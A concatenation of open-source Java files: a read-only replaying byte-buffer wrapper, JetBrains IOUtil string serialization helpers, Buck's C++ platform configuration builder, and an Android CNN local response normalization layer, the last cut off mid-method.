return buffer.readerIndex();
}
@Override
public ByteBuf readerIndex(int readerIndex) {
buffer.readerIndex(readerIndex);
return this;
}
@Override
public int readInt() {
checkReadableBytes(4);
return buffer.readInt();
}
@Override
public long readUnsignedInt() {
checkReadableBytes(4);
return buffer.readUnsignedInt();
}
@Override
public long readLong() {
checkReadableBytes(8);
return buffer.readLong();
}
@Override
public int readMedium() {
checkReadableBytes(3);
return buffer.readMedium();
}
@Override
public int readUnsignedMedium() {
checkReadableBytes(3);
return buffer.readUnsignedMedium();
}
@Override
public short readShort() {
checkReadableBytes(2);
return buffer.readShort();
}
@Override
public int readUnsignedShort() {
checkReadableBytes(2);
return buffer.readUnsignedShort();
}
@Override
public char readChar() {
checkReadableBytes(2);
return buffer.readChar();
}
@Override
public float readFloat() {
checkReadableBytes(4);
return buffer.readFloat();
}
@Override
public double readDouble() {
checkReadableBytes(8);
return buffer.readDouble();
}
@Override
public ByteBuf resetReaderIndex() {
buffer.resetReaderIndex();
return this;
}
@Override
public ByteBuf resetWriterIndex() {
reject();
return this;
}
@Override
public ByteBuf setBoolean(int index, boolean value) {
reject();
return this;
}
@Override
public ByteBuf setByte(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, byte[] src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, byte[] src) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuffer src) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuf src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuf src, int length) {
reject();
return this;
}
@Override
public ByteBuf setBytes(int index, ByteBuf src) {
reject();
return this;
}
@Override
public int setBytes(int index, InputStream in, int length) {
reject();
return 0;
}
@Override
public ByteBuf setZero(int index, int length) {
reject();
return this;
}
@Override
public int setBytes(int index, ScatteringByteChannel in, int length) {
reject();
return 0;
}
@Override
public ByteBuf setIndex(int readerIndex, int writerIndex) {
reject();
return this;
}
@Override
public ByteBuf setInt(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setLong(int index, long value) {
reject();
return this;
}
@Override
public ByteBuf setMedium(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setShort(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setChar(int index, int value) {
reject();
return this;
}
@Override
public ByteBuf setFloat(int index, float value) {
reject();
return this;
}
@Override
public ByteBuf setDouble(int index, double value) {
reject();
return this;
}
@Override
public ByteBuf skipBytes(int length) {
checkReadableBytes(length);
buffer.skipBytes(length);
return this;
}
@Override
public ByteBuf slice() {
reject();
return this;
}
@Override
public ByteBuf slice(int index, int length) {
checkIndex(index, length);
return buffer.slice(index, length);
}
@Override
public int nioBufferCount() {
return buffer.nioBufferCount();
}
@Override
public ByteBuffer nioBuffer() {
reject();
return null;
}
@Override
public ByteBuffer nioBuffer(int index, int length) {
checkIndex(index, length);
return buffer.nioBuffer(index, length);
}
@Override
public ByteBuffer[] nioBuffers() {
reject();
return null;
}
@Override
public ByteBuffer[] nioBuffers(int index, int length) {
checkIndex(index, length);
return buffer.nioBuffers(index, length);
}
@Override
public ByteBuffer internalNioBuffer(int index, int length) {
checkIndex(index, length);
return buffer.internalNioBuffer(index, length);
}
@Override
public String toString(int index, int length, Charset charset) {
checkIndex(index, length);
return buffer.toString(index, length, charset);
}
@Override
public String toString(Charset charsetName) {
reject();
return null;
}
@Override
public String toString() {
return StringUtil.simpleClassName(this) + '(' +
"ridx=" +
readerIndex() +
", " +
"widx=" +
writerIndex() +
')';
}
@Override
public boolean isWritable() {
return false;
}
@Override
public boolean isWritable(int size) {
return false;
}
@Override
public int writableBytes() {
return 0;
}
@Override
public int maxWritableBytes() {
return 0;
}
@Override
public ByteBuf writeBoolean(boolean value) {
reject();
return this;
}
@Override
public ByteBuf writeByte(int value) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(byte[] src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(byte[] src) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuffer src) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuf src, int srcIndex, int length) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuf src, int length) {
reject();
return this;
}
@Override
public ByteBuf writeBytes(ByteBuf src) {
reject();
return this;
}
@Override
public int writeBytes(InputStream in, int length) {
reject();
return 0;
}
@Override
public int writeBytes(ScatteringByteChannel in, int length) {
reject();
return 0;
}
@Override
public ByteBuf writeInt(int value) {
reject();
return this;
}
@Override
public ByteBuf writeLong(long value) {
reject();
return this;
}
@Override
public ByteBuf writeMedium(int value) {
reject();
return this;
}
@Override
public ByteBuf writeZero(int length) {
reject();
return this;
}
@Override
public int writerIndex() {
return buffer.writerIndex();
}
@Override
public ByteBuf writerIndex(int writerIndex) {
reject();
return this;
}
@Override
public ByteBuf writeShort(int value) {
reject();
return this;
}
@Override
public ByteBuf writeChar(int value) {
reject();
return this;
}
@Override
public ByteBuf writeFloat(float value) {
reject();
return this;
}
@Override
public ByteBuf writeDouble(double value) {
reject();
return this;
}
private void checkIndex(int index, int length) {
if (index + length > buffer.writerIndex()) {
throw REPLAY;
}
}
private void checkReadableBytes(int readableBytes) {
if (buffer.readableBytes() < readableBytes) {
throw REPLAY;
}
}
@Override
public ByteBuf discardSomeReadBytes() {
reject();
return this;
}
@Override
public int refCnt() {
return buffer.refCnt();
}
@Override
public ByteBuf retain() {
reject();
return this;
}
@Override
public ByteBuf retain(int increment) {
reject();
return this;
}
@Override
public ByteBuf touch() {
buffer.touch();
return this;
}
@Override
public ByteBuf touch(Object hint) {
buffer.touch(hint);
return this;
}
@Override
public boolean release() {
reject();
return false;
}
@Override
public boolean release(int decrement) {
reject();
return false;
}
@Override
public ByteBuf unwrap() {
reject();
return this;
}
private static void reject() {
throw new UnsupportedOperationException("not a replayable operation");
}
}
|
|
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.util.io;
import com.intellij.openapi.util.ThreadLocalCachedValue;
import com.intellij.openapi.util.ThrowableComputable;
import com.intellij.openapi.util.io.FileUtil;
import com.intellij.openapi.vfs.CharsetToolkit;
import com.intellij.util.SystemProperties;
import org.jetbrains.annotations.NonNls;
import org.jetbrains.annotations.NotNull;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.Charset;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
public class IOUtil {
public static final boolean ourByteBuffersUseNativeByteOrder = SystemProperties.getBooleanProperty("idea.bytebuffers.use.native.byte.order", true);
private static final int STRING_HEADER_SIZE = 1;
private static final int STRING_LENGTH_THRESHOLD = 255;
@NonNls private static final String LONGER_THAN_64K_MARKER = "LONGER_THAN_64K";
private IOUtil() {}
public static String readString(@NotNull DataInput stream) throws IOException {
int length = stream.readInt();
if (length == -1) return null;
if (length == 0) return "";
byte[] bytes = new byte[length*2];
stream.readFully(bytes);
return new String(bytes, 0, length*2, CharsetToolkit.UTF_16BE_CHARSET);
}
public static void writeString(String s, @NotNull DataOutput stream) throws IOException {
if (s == null) {
stream.writeInt(-1);
return;
}
stream.writeInt(s.length());
if (s.isEmpty()) {
return;
}
char[] chars = s.toCharArray();
byte[] bytes = new byte[chars.length * 2];
for (int i = 0, i2 = 0; i < chars.length; i++, i2 += 2) {
char aChar = chars[i];
bytes[i2] = (byte)(aChar >>> 8 & 0xFF);
bytes[i2 + 1] = (byte)(aChar & 0xFF);
}
stream.write(bytes);
}
public static void writeUTFTruncated(@NotNull DataOutput stream, @NotNull String text) throws IOException {
// we should not compare number of symbols to 65635 -> it is number of bytes what should be compared
// ? 4 bytes per symbol - rough estimation
if (text.length() > 16383) {
stream.writeUTF(text.substring(0, 16383));
}
else {
stream.writeUTF(text);
}
}
private static final ThreadLocalCachedValue<byte[]> ourReadWriteBuffersCache = new ThreadLocalCachedValue<byte[]>() {
@Override
protected byte[] create() {
return allocReadWriteUTFBuffer();
}
};
public static void writeUTF(@NotNull DataOutput storage, @NotNull final String value) throws IOException {
writeUTFFast(ourReadWriteBuffersCache.getValue(), storage, value);
}
public static String readUTF(@NotNull DataInput storage) throws IOException {
return readUTFFast(ourReadWriteBuffersCache.getValue(), storage);
}
@NotNull
public static byte[] allocReadWriteUTFBuffer() {
return new byte[STRING_LENGTH_THRESHOLD + STRING_HEADER_SIZE];
}
public static void writeUTFFast(@NotNull byte[] buffer, @NotNull DataOutput storage, @NotNull final String value) throws IOException {
int len = value.length();
if (len < STRING_LENGTH_THRESHOLD) {
buffer[0] = (byte)len;
boolean isAscii = true;
for (int i = 0; i < len; i++) {
char c = value.charAt(i);
if (c >= 128) {
isAscii = false;
break;
}
buffer[i + STRING_HEADER_SIZE] = (byte)c;
}
if (isAscii) {
storage.write(buffer, 0, len + STRING_HEADER_SIZE);
return;
}
}
storage.writeByte((byte)0xFF);
try {
storage.writeUTF(value);
}
catch (UTFDataFormatException e) {
storage.writeUTF(LONGER_THAN_64K_MARKER);
writeString(value, storage);
}
}
public static final Charset US_ASCII = Charset.forName("US-ASCII");
private static final ThreadLocalCachedValue<char[]> spareBufferLocal = new ThreadLocalCachedValue<char[]>() {
@Override
protected char[] create() {
return new char[STRING_LENGTH_THRESHOLD];
}
};
public static String readUTFFast(@NotNull byte[] buffer, @NotNull DataInput storage) throws IOException {
int len = 0xFF & (int)storage.readByte();
if (len == 0xFF) {
String result = storage.readUTF();
if (LONGER_THAN_64K_MARKER.equals(result)) {
return readString(storage);
}
return result;
}
if (len == 0) return "";
storage.readFully(buffer, 0, len);
char[] chars = spareBufferLocal.getValue();
for(int i = 0; i < len; ++i) chars[i] = (char)(buffer[i] &0xFF);
return new String(chars, 0, len);
}
public static boolean isAscii(@NotNull String str) {
return isAscii((CharSequence)str);
}
public static boolean isAscii(@NotNull CharSequence str) {
for (int i = 0, length = str.length(); i < length; ++ i) {
if (str.charAt(i) >= 128) return false;
}
return true;
}
public static boolean isAscii(char c) {
return c < 128;
}
public static boolean deleteAllFilesStartingWith(@NotNull File file) {
final String baseName = file.getName();
File parentFile = file.getParentFile();
final File[] files = parentFile != null ? parentFile.listFiles(new FileFilter() {
@Override
public boolean accept(final File pathname) {
return pathname.getName().startsWith(baseName);
}
}): null;
boolean ok = true;
if (files != null) {
for (File f : files) {
ok &= FileUtil.delete(f);
}
}
return ok;
}
public static void syncStream(OutputStream stream) throws IOException {
stream.flush();
try {
Field outField = FilterOutputStream.class.getDeclaredField("out");
outField.setAccessible(true);
while (stream instanceof FilterOutputStream) {
Object o = outField.get(stream);
if (o instanceof OutputStream) {
stream = (OutputStream)o;
} else {
break;
}
}
if (stream instanceof FileOutputStream) {
((FileOutputStream)stream).getFD().sync();
}
}
catch (NoSuchFieldException e) {
throw new RuntimeException(e);
}
catch (IllegalAccessException e) {
throw new RuntimeException(e);
}
}
public static <T> T openCleanOrResetBroken(@NotNull ThrowableComputable<T, IOException> factoryComputable, final File file) throws IOException {
return openCleanOrResetBroken(factoryComputable, new Runnable() {
@Override
public void run() {
deleteAllFilesStartingWith(file);
}
});
}
public static <T> T openCleanOrResetBroken(@NotNull ThrowableComputable<T, IOException> factoryComputable, Runnable cleanupCallback) throws IOException {
for(int i = 0; i < 2; ++i) {
try {
return factoryComputable.compute();
} catch (IOException ex) {
if (i == 1) throw ex;
cleanupCallback.run();
}
}
return null;
}
public static void writeStringList(final DataOutput out, final Collection<String> list) throws IOException {
DataInputOutputUtil.writeINT(out, list.size());
for (final String s : list) {
writeUTF(out, s);
}
}
public static List<String> readStringList(final DataInput in) throws IOException {
final int size = DataInputOutputUtil.readINT(in);
final ArrayList<String> strings = new ArrayList<String>(size);
for (int i = 0; i < size; i++) {
strings.add(readUTF(in));
}
return strings;
}
}
|
|
/*
* Copyright 2015-present Facebook, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License. You may obtain
* a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package com.facebook.buck.cxx;
import com.facebook.buck.log.Logger;
import com.facebook.buck.model.BuildTarget;
import com.facebook.buck.model.Flavor;
import com.facebook.buck.model.InternalFlavor;
import com.facebook.buck.rules.HashedFileTool;
import com.facebook.buck.rules.LazyDelegatingTool;
import com.facebook.buck.rules.Tool;
import com.facebook.buck.util.HumanReadableException;
import com.facebook.buck.util.environment.Platform;
import com.google.common.base.Function;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSet;
import java.util.Optional;
public class CxxPlatforms {
private static final Logger LOG = Logger.get(CxxPlatforms.class);
private static final ImmutableList<String> DEFAULT_ASFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_ASPPFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CXXFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CPPFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_CXXPPFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_LDFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_ARFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_RANLIBFLAGS = ImmutableList.of();
private static final ImmutableList<String> DEFAULT_COMPILER_ONLY_FLAGS = ImmutableList.of();
// Utility class, do not instantiate.
private CxxPlatforms() { }
private static Optional<SharedLibraryInterfaceFactory> getSharedLibraryInterfaceFactory(
CxxBuckConfig config,
Platform platform) {
Optional<SharedLibraryInterfaceFactory> sharedLibraryInterfaceFactory = Optional.empty();
if (config.shouldUseSharedLibraryInterfaces()) {
switch (platform) {
case LINUX:
sharedLibraryInterfaceFactory =
Optional.of(
ElfSharedLibraryInterfaceFactory.of(config.getToolProvider("objcopy").get()));
break;
// $CASES-OMITTED$
default:
}
}
return sharedLibraryInterfaceFactory;
}
public static CxxPlatform build(
Flavor flavor,
Platform platform,
final CxxBuckConfig config,
CompilerProvider as,
PreprocessorProvider aspp,
CompilerProvider cc,
CompilerProvider cxx,
PreprocessorProvider cpp,
PreprocessorProvider cxxpp,
LinkerProvider ld,
Iterable<String> ldFlags,
Tool strip,
final Archiver ar,
final Tool ranlib,
final SymbolNameTool nm,
ImmutableList<String> asflags,
ImmutableList<String> asppflags,
ImmutableList<String> cflags,
ImmutableList<String> cppflags,
String sharedLibraryExtension,
String sharedLibraryVersionedExtensionFormat,
String staticLibraryExtension,
String objectFileExtension,
DebugPathSanitizer compilerDebugPathSanitizer,
DebugPathSanitizer assemblerDebugPathSanitizer,
ImmutableMap<String, String> flagMacros,
Optional<String> binaryExtension,
HeaderVerification headerVerification) {
// TODO(beng, agallagher): Generalize this so we don't need all these setters.
CxxPlatform.Builder builder = CxxPlatform.builder();
final Archiver arDelegate = ar instanceof LazyDelegatingArchiver ?
((LazyDelegatingArchiver) ar).getDelegate() : ar;
builder
.setFlavor(flavor)
.setAs(config.getCompilerProvider("as").orElse(as))
.setAspp(config.getPreprocessorProvider("aspp").orElse(aspp))
.setCc(config.getCompilerProvider("cc").orElse(cc))
.setCxx(config.getCompilerProvider("cxx").orElse(cxx))
.setCpp(config.getPreprocessorProvider("cpp").orElse(cpp))
.setCxxpp(config.getPreprocessorProvider("cxxpp").orElse(cxxpp))
.setCuda(config.getCompilerProvider("cuda"))
.setCudapp(config.getPreprocessorProvider("cudapp"))
.setAsm(config.getCompilerProvider("asm"))
.setAsmpp(config.getPreprocessorProvider("asmpp"))
.setLd(config.getLinkerProvider("ld", ld.getType()).orElse(ld))
.addAllLdflags(ldFlags)
.setAr(new LazyDelegatingArchiver(() ->
getTool("ar", config)
.map(getArchiver(arDelegate.getClass(), config)::apply)
.orElse(arDelegate)))
.setRanlib(new LazyDelegatingTool(() -> getTool("ranlib", config).orElse(ranlib)))
.setStrip(getTool("strip", config).orElse(strip))
.setSharedLibraryExtension(sharedLibraryExtension)
.setSharedLibraryVersionedExtensionFormat(sharedLibraryVersionedExtensionFormat)
.setStaticLibraryExtension(staticLibraryExtension)
.setObjectFileExtension(objectFileExtension)
.setCompilerDebugPathSanitizer(compilerDebugPathSanitizer)
.setAssemblerDebugPathSanitizer(assemblerDebugPathSanitizer)
.setFlagMacros(flagMacros)
.setBinaryExtension(binaryExtension)
.setHeaderVerification(headerVerification)
.setPublicHeadersSymlinksEnabled(config.getPublicHeadersSymlinksEnabled())
.setPrivateHeadersSymlinksEnabled(config.getPrivateHeadersSymlinksEnabled());
builder.setSymbolNameTool(new LazyDelegatingSymbolNameTool(() -> {
Optional<Tool> configNm = getTool("nm", config);
if (configNm.isPresent()) {
return new PosixNmSymbolNameTool(configNm.get());
} else {
return nm;
}
}));
builder.setSharedLibraryInterfaceFactory(getSharedLibraryInterfaceFactory(config, platform));
builder.addAllCflags(cflags);
builder.addAllCxxflags(cflags);
builder.addAllCppflags(cppflags);
builder.addAllCxxppflags(cppflags);
builder.addAllAsflags(asflags);
builder.addAllAsppflags(asppflags);
CxxPlatforms.addToolFlagsFromConfig(config, builder);
return builder.build();
}
/**
* Creates a CxxPlatform with a defined flavor for a CxxBuckConfig with default values
* provided from another default CxxPlatform
*/
public static CxxPlatform copyPlatformWithFlavorAndConfig(
CxxPlatform defaultPlatform,
Platform platform,
CxxBuckConfig config,
Flavor flavor) {
return CxxPlatforms.build(
flavor,
platform,
config,
defaultPlatform.getAs(),
defaultPlatform.getAspp(),
defaultPlatform.getCc(),
defaultPlatform.getCxx(),
defaultPlatform.getCpp(),
defaultPlatform.getCxxpp(),
defaultPlatform.getLd(),
defaultPlatform.getLdflags(),
defaultPlatform.getStrip(),
defaultPlatform.getAr(),
defaultPlatform.getRanlib(),
defaultPlatform.getSymbolNameTool(),
defaultPlatform.getAsflags(),
defaultPlatform.getAsppflags(),
defaultPlatform.getCflags(),
defaultPlatform.getCppflags(),
defaultPlatform.getSharedLibraryExtension(),
defaultPlatform.getSharedLibraryVersionedExtensionFormat(),
defaultPlatform.getStaticLibraryExtension(),
defaultPlatform.getObjectFileExtension(),
defaultPlatform.getCompilerDebugPathSanitizer(),
defaultPlatform.getAssemblerDebugPathSanitizer(),
defaultPlatform.getFlagMacros(),
defaultPlatform.getBinaryExtension(),
defaultPlatform.getHeaderVerification());
}
private static Function<Tool, Archiver> getArchiver(final Class<? extends Archiver> arClass,
final CxxBuckConfig config) {
return input -> {
try {
return config.getArchiver(input)
.orElse(arClass.getConstructor(Tool.class).newInstance(input));
} catch (ReflectiveOperationException e) {
throw new RuntimeException(e);
}
};
}
private static ImmutableMap<String, Flavor> getHostFlavorMap() {
// TODO(coneko): base the host flavor on architecture, too.
return ImmutableMap.<String, Flavor>builder()
.put(Platform.LINUX.getAutoconfName(), InternalFlavor.of("linux-x86_64"))
.put(Platform.MACOS.getAutoconfName(), InternalFlavor.of("macosx-x86_64"))
.put(Platform.WINDOWS.getAutoconfName(), InternalFlavor.of("windows-x86_64"))
.put(Platform.FREEBSD.getAutoconfName(), InternalFlavor.of("freebsd-x86_64"))
.build();
}
public static ImmutableSet<Flavor> getAllPossibleHostFlavors() {
return ImmutableSet.copyOf(getHostFlavorMap().values());
}
public static Flavor getHostFlavor() {
String platformName = Platform.detect().getAutoconfName();
Flavor hostFlavor = getHostFlavorMap().get(platformName);
if (hostFlavor == null) {
throw new HumanReadableException("Unable to determine the host platform.");
}
return hostFlavor;
}
public static void addToolFlagsFromConfig(
CxxBuckConfig config,
CxxPlatform.Builder builder) {
ImmutableList<String> asflags = config.getFlags("asflags").orElse(DEFAULT_ASFLAGS);
ImmutableList<String> cflags = config.getFlags("cflags").orElse(DEFAULT_CFLAGS);
ImmutableList<String> cxxflags = config.getFlags("cxxflags").orElse(DEFAULT_CXXFLAGS);
ImmutableList<String> compilerOnlyFlags = config.getFlags("compiler_only_flags").orElse(
DEFAULT_COMPILER_ONLY_FLAGS);
builder
.addAllAsflags(asflags)
.addAllAsppflags(config.getFlags("asppflags").orElse(DEFAULT_ASPPFLAGS))
.addAllCflags(cflags)
.addAllCflags(compilerOnlyFlags)
.addAllCxxflags(cxxflags)
.addAllCxxflags(compilerOnlyFlags)
.addAllCppflags(config.getFlags("cppflags").orElse(DEFAULT_CPPFLAGS))
.addAllCxxppflags(config.getFlags("cxxppflags").orElse(DEFAULT_CXXPPFLAGS))
.addAllCudaflags(config.getFlags("cudaflags").orElse(ImmutableList.of()))
.addAllCudappflags(config.getFlags("cudappflags").orElse(ImmutableList.of()))
.addAllAsmflags(config.getFlags("asmflags").orElse(ImmutableList.of()))
.addAllAsmppflags(config.getFlags("asmppflags").orElse(ImmutableList.of()))
.addAllLdflags(config.getFlags("ldflags").orElse(DEFAULT_LDFLAGS))
.addAllArflags(config.getFlags("arflags").orElse(DEFAULT_ARFLAGS))
.addAllRanlibflags(config.getFlags("ranlibflags").orElse(DEFAULT_RANLIBFLAGS));
}
public static CxxPlatform getConfigDefaultCxxPlatform(
CxxBuckConfig cxxBuckConfig,
ImmutableMap<Flavor, CxxPlatform> cxxPlatformsMap,
CxxPlatform systemDefaultCxxPlatform) {
CxxPlatform defaultCxxPlatform;
Optional<String> defaultPlatform = cxxBuckConfig.getDefaultPlatform();
if (defaultPlatform.isPresent()) {
defaultCxxPlatform = cxxPlatformsMap.get(
InternalFlavor.of(defaultPlatform.get()));
if (defaultCxxPlatform == null) {
LOG.warn(
"Couldn't find default platform %s, falling back to system default",
defaultPlatform.get());
} else {
LOG.debug("Using config default C++ platform %s", defaultCxxPlatform);
return defaultCxxPlatform;
}
} else {
LOG.debug("Using system default C++ platform %s", systemDefaultCxxPlatform);
}
return systemDefaultCxxPlatform;
}
private static Optional<Tool> getTool(String name, CxxBuckConfig config) {
return config.getPath(name).map(HashedFileTool::new);
}
public static Iterable<BuildTarget> getParseTimeDeps(CxxPlatform cxxPlatform) {
ImmutableList.Builder<BuildTarget> deps = ImmutableList.builder();
deps.addAll(cxxPlatform.getAspp().getParseTimeDeps());
deps.addAll(cxxPlatform.getAs().getParseTimeDeps());
deps.addAll(cxxPlatform.getCpp().getParseTimeDeps());
deps.addAll(cxxPlatform.getCc().getParseTimeDeps());
deps.addAll(cxxPlatform.getCxxpp().getParseTimeDeps());
deps.addAll(cxxPlatform.getCxx().getParseTimeDeps());
if (cxxPlatform.getCudapp().isPresent()) {
deps.addAll(cxxPlatform.getCudapp().get().getParseTimeDeps());
}
if (cxxPlatform.getCuda().isPresent()) {
deps.addAll(cxxPlatform.getCuda().get().getParseTimeDeps());
}
if (cxxPlatform.getAsmpp().isPresent()) {
deps.addAll(cxxPlatform.getAsmpp().get().getParseTimeDeps());
}
if (cxxPlatform.getAsm().isPresent()) {
deps.addAll(cxxPlatform.getAsm().get().getParseTimeDeps());
}
deps.addAll(cxxPlatform.getLd().getParseTimeDeps());
cxxPlatform.getSharedLibraryInterfaceFactory()
.ifPresent(f -> deps.addAll(f.getParseTimeDeps()));
return deps.build();
}
public static Iterable<BuildTarget> getParseTimeDeps(Iterable<CxxPlatform> cxxPlatforms) {
ImmutableList.Builder<BuildTarget> deps = ImmutableList.builder();
for (CxxPlatform cxxPlatform : cxxPlatforms) {
deps.addAll(getParseTimeDeps(cxxPlatform));
}
return deps.build();
}
}
|
|
package layers;
import android.util.Log;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.util.Scanner;
import numdroid.*;
public class LocalResponseNormalization implements LayerInterface {
private String name; // name of the layer
private MyNum myNum; // for mathematical calculations
private int localSize; // local size
private double alpha; // alpha
private double beta; // beta
private String normRegion; // norm region: "across_channels"
private boolean parallel; // implementation method (parallel or sequential)
private String tuningFolder; // location to store online tuning results
private boolean tuneNow; // flag to weather execute tuning ro not
private boolean tuneFunc; // flag of optional tuning function
private int threadCount; // thread count for acceleration
private int[] threadCounts = {4, 6, 8};
public LocalResponseNormalization(int localSize, double alpha, double beta, String normRegion,
boolean parallel, boolean tuneFunc, String name, String tuningFolder) {
this.localSize = localSize;
this.alpha = alpha;
this.beta = beta;
this.normRegion = normRegion;
this.parallel = parallel;
this.tuneFunc = tuneFunc;
this.name = name;
myNum = new MyNum();
this.tuningFolder = tuningFolder;
tuneNow = false;
File f = new File(tuningFolder + "/" + name + ".txt");
try {
Scanner s = new Scanner(f);
threadCount = Integer.valueOf(s.nextLine());
if (corrupted(threadCount))
tuneNow = true;
} catch (FileNotFoundException e) {
tuneNow = true;
}
if (!tuneFunc) {
threadCount = 4;
tuneNow = false;
}
}
@Override
public Object compute(Object input) {
Object output;
long runTime = System.currentTimeMillis();
if (!parallel)
output = lrnLayerSeq((float[][][][])input, localSize, alpha, beta, normRegion);
else if (tuneNow)
output = tuneFunction((float[][][][]) input);
else
output = lrnLayerMultithread((float[][][][]) input, localSize, alpha, beta, normRegion, threadCount);
runTime = System.currentTimeMillis() - runTime;
Log.d("CNNdroid", "layers." + name + ": Computation Run Time = " + String.valueOf(runTime));
return output;
}
///////////////////////////////////////Sequential///////////////////////////////////////////////
private float[][][][] lrnLayerSeq(float[][][][] inputBlob, int localSize, double alpha,
double beta, String normRegion) {
// Calculate sizes.
int n_i = inputBlob.length;
int c_i = inputBlob[0].length;
int h_i = inputBlob[0][0].length;
int w_i = inputBlob[0][0][0].length;
// Initialize the result.
float[][][][] outputBlob = new float[n_i][c_i][h_i][w_i];
// Calculate the result.
if (normRegion.equals("across_channels"))
{
for (int n = 0; n < n_i; ++n)
for (int c = 0; c < c_i; ++c)
// For first few channels, do zero padding.
if (c < (localSize - 1) / 2)
outputBlob[n][c] = myNum.divide(inputBlob[n][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, n, 0, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
// For last few channels, do zero padding.
else if (c > c_i - (localSize - 1) / 2 - 1)
outputBlob[n][c] = myNum.divide(inputBlob[n][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, n, c - (localSize - 1) / 2, c_i, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
else
outputBlob[n][c] = myNum.divide(inputBlob[n][c], myNum.power(myNum.sum(myNum.multiply(myNum.mean(myNum.power(inputBlob, n, c - (localSize - 1) / 2, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float) alpha), 1), beta));
}
return outputBlob;
}
///////////////////////////////////////Multithread//////////////////////////////////////////////
public float[][][][] lrnLayerMultithread(float[][][][] inputBlob, int localSize, double alpha,
double beta, String normRegion, int threadCount) {
// Calculate sizes.
int n_i = inputBlob.length;
int c_i = inputBlob[0].length;
int h_i = inputBlob[0][0].length;
int w_i = inputBlob[0][0][0].length;
// Initialize the result.
float[][][][] outputBlob = new float[n_i][c_i][h_i][w_i];
// Calculate the result.
if (normRegion.equals("across_channels"))
{
for (int frame = 0 ; frame < n_i ; frame++) {
// Calculate the result
MultiThreadLrn[] threads = new MultiThreadLrn[threadCount];
for (int thread = 0; thread < threadCount ; ++thread) {
threads[thread] = new MultiThreadLrn(inputBlob, frame, c_i, h_i, w_i, localSize, alpha, beta, myNum, thread, threadCount);
threads[thread].start();
}
while (true) {
int thread;
for (thread = 0; thread < threadCount ; thread++)
if (!threads[thread].done)
break;
if (thread == threadCount)
break;
try {
Thread.sleep(5);
} catch (InterruptedException e) {
e.printStackTrace();
}
}
for (int thread = 0; thread < threadCount ; ++thread) {
int channelCount = c_i / threadCount;
if (c_i % threadCount != 0)
channelCount += 1;
int cStart = thread * channelCount;
int cEnd = cStart + channelCount;
if (cStart > c_i)
cStart = c_i;
if (cEnd > c_i)
cEnd = c_i;
for (int c = cStart ; c < cEnd ; ++c)
outputBlob[frame][c]=threads[thread].outputBlob[c - cStart];
}
}
}
return outputBlob;
}
/////////////////////////////////////////Tuning Function////////////////////////////////////////
private Object tuneFunction(float[][][][] input){
Log.d("CNNdroid", "layers." + name + ": Tuning process is starting...");
long tuneTime = System.currentTimeMillis();
tuneNow = false;
long[] time = new long[threadCounts.length];
for (int i = 0 ; i < threadCounts.length ; i++)
time[i] = 0;
long temp;
int c_i = input[0].length;
float[][][][] tuneInput = new float[1][c_i][input[0][0].length][input[0][0][0].length];
tuneInput[0] = input[0];
Object output = null;
for (int i = 0; i < 4; i++) {
for (int thread = 0 ; thread < threadCounts.length ; thread++) {
temp = System.currentTimeMillis();
output = lrnLayerMultithread(input, localSize, alpha, beta, normRegion, thread);
time[thread] += System.currentTimeMillis() - temp;
}
}
int min = 0;
for (int i = 0; i < threadCounts.length ; i++)
if (time[i] <= time[min])
min = i;
threadCount = threadCounts[min];
writeFile(threadCount);
tuneTime = System.currentTimeMillis() - tuneTime;
Log.d("CNNdroid", "layers." + name + ": Tuning process finished in " + tuneTime + "ms.");
return output;
}
////////////////////////////////////////Local Functions/////////////////////////////////////////
private boolean corrupted(int threadCount)
{
for (int i = 0 ; i < threadCounts.length ; i++)
if (threadCount == threadCounts[i])
return false;
return true;
}
private void writeFile(int threadCount)
{
File f = new File(tuningFolder + "/" + name + ".txt");
if(f.exists())
f.delete();
try {
f.createNewFile();
